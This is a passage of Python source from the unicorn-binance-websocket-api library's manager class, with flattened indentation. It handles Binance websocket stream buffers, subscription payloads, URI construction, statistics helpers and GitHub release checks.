        data cannot be saved), you can push the data back into the stream_buffer. A few seconds after you stop writing
        data back to the stream_buffer, the BinanceWebSocketApiManager starts flushing the buffered data back to normal
        processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
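Illustrative example (a minimal sketch - assumes a running manager instance named
``binance_websocket_api_manager``, a shared stream_buffer called "trades" and a record ``data`` that could not
be processed):
``binance_websocket_api_manager.add_to_stream_buffer(data, stream_buffer_name="trades")``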
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
:type signal_type: str
:param stream_id: id of a stream
:type stream_id: uuid
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
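Illustrative example (a minimal sketch - this method is normally used internally; enabling the buffer via the
constructor and reading it with ``pop_stream_signal_from_stream_signal_buffer()`` are assumptions about the
surrounding API):
``binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com", enable_stream_signal_buffer=True)``
``stream_signal = binance_websocket_api_manager.pop_stream_signal_from_stream_signal_buffer()``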
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logging.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logging.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def clear_stream_buffer(self, stream_buffer_name=False):
"""
Clear the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
try:
self.stream_buffer.clear()
return True
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].clear()
return True
except IndexError:
return False
except KeyError:
return False
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: uuid
:param method: `SUBSCRIBE` or `UNSUBSCRIBE`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in list(markets):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
def create_stream(self,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=20,
ping_timeout=20,
close_timeout=10,
stream_buffer_maxlen=None):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a subscription limit per stream!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/Binance-websocket-endpoint-configuration-overview>`_
Create `!userData` streams as single streams, because they use a different endpoint and cannot be combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which also includes `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr`, you just need to add `!bookTicker` to the channels list - don't add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globally overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of `BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keep
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:return: stream_id or 'False'
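Illustrative example (a minimal sketch with arbitrary values - shows how the websockets related parameters and
``stream_buffer_maxlen`` can be passed):
``from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager``
``binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")``
``stream_id = binance_websocket_api_manager.create_stream(['trade'], ['btcusdt'], stream_label="trades", stream_buffer_name=True, stream_buffer_maxlen=1000, ping_interval=10, ping_timeout=10, close_timeout=5)``
``data = binance_websocket_api_manager.pop_stream_data_from_stream_buffer(stream_id)``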
"""
# create a stream
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if output is False:
output = self.output_default
stream_id = uuid.uuid4()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logging.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout,
stream_buffer_maxlen=stream_buffer_maxlen)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}), {stream_buffer_maxlen} "
f"with stream_id="
f"{str(stream_id)} - OSError - can not create stream - error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread, args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
stream_buffer_maxlen,
False))
thread.start()
return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden_secret = self.websocket_base_uri + "ws/" + self.replaced_secrets_text
if self.show_secrets_in_logs is True:
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden_secret)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: uuid
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logging.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or gets stopped, its data remains in the BinanceWebSocketApiManager until you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
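Illustrative example (a minimal sketch - assumes a manager instance named ``binance_websocket_api_manager`` and
that ``stop_stream()`` was used to stop the stream first):
``binance_websocket_api_manager.stop_stream(stream_id)``
``binance_websocket_api_manager.delete_stream_from_stream_list(stream_id)``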
"""
logging.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how many chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how many chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how many chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
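Illustrative example (a minimal sketch - pads a value to a width of 10 chars with dots; ``fill_up_space_left()``
and ``fill_up_space_centered()`` work the same way for the other alignments):
``binance_websocket_api_manager.fill_up_space_right(10, "BTC", filling=".")``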
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: set or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
if len(stream_list_with_active_streams) > 0:
return stream_list_with_active_streams
except KeyError:
return False
except UnboundLocalError:
return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_binance_api_status(self):
"""
`get_binance_api_status()` is obsolete and will be removed in future releases, please use `get_used_weight()`
instead!
:return: dict
"""
logging.warning("`get_binance_api_status()` is obsolete and will be removed in future releases, please use"
"`get_used_weight()` instead!")
return self.binance_api_status
def get_used_weight(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
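Illustrative example (a minimal sketch - the values are populated by the REST requests the manager performs for
``!userData`` streams, so the dict may be empty otherwise):
``print(binance_websocket_api_manager.get_used_weight())``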
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
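Illustrative example (a minimal sketch - prints the global receiving speed in a human readable form via
``get_human_bytesize()``):
``speed = binance_websocket_api_manager.get_current_receiving_speed_global()``
``print(binance_websocket_api_manager.get_human_bytesize(speed, "/s"))``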
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logging.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
except TypeError as error_msg:
logging.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_errors_from_endpoints(self):
"""
Get all error messages sent by the endpoints that are stored in the ringbuffer.
:return: list
"""
return self.ringbuffer_error
def get_event_loop_by_stream_id(self, stream_id=False):
"""
Get the asyncio event loop used by a specific stream.
:return: asyncio event loop or False
"""
if stream_id is False:
return False
else:
return self.event_loops[stream_id]
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return:
"""
if bytes > 1024 * 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return:
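Illustrative example (a minimal sketch - converts the uptime of a manager instance named
``binance_websocket_api_manager`` into a readable string):
``print(binance_websocket_api_manager.get_human_uptime(time.time() - binance_websocket_api_manager.get_start_time()))``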
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
Get info about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/oliver-zehentleitner/unicorn-binance-websocket-api/'
'releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get info about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or the last timestamp is older than 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
